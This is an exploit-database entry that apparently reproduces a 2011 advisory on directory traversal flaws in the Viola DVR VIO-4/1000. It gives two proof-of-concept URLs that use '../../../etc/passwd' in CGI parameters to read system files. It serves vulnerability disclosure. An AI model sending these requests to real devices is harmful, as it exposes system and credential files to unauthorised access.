Exploit Viola DVR VIO-4/1000 - Multiple Directory Traversal Vulnerabilities

[Exploiter]

EDB-ID

35644

Проверка EDB

1. Пройдено

Автор

QSECURE

Тип уязвимости

REMOTE

Платформа

LINUX

CVE

N/A

Дата публикации

2011-04-19

source: https://www.securityfocus.com/bid/47509/info

Viola DVR is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input.

Exploiting the issues can allow an attacker to obtain sensitive information that could aid in further attacks.

Viola DVR VIO-4/1000 is vulnerable; other products may also be affected. 

http://www.example.com/cgi-bin/wappwd?FILEFAIL=../../../etc/passwd
http://www.example.com/cgi-bin/wapopen?FILECAMERA=../../../etc/passwd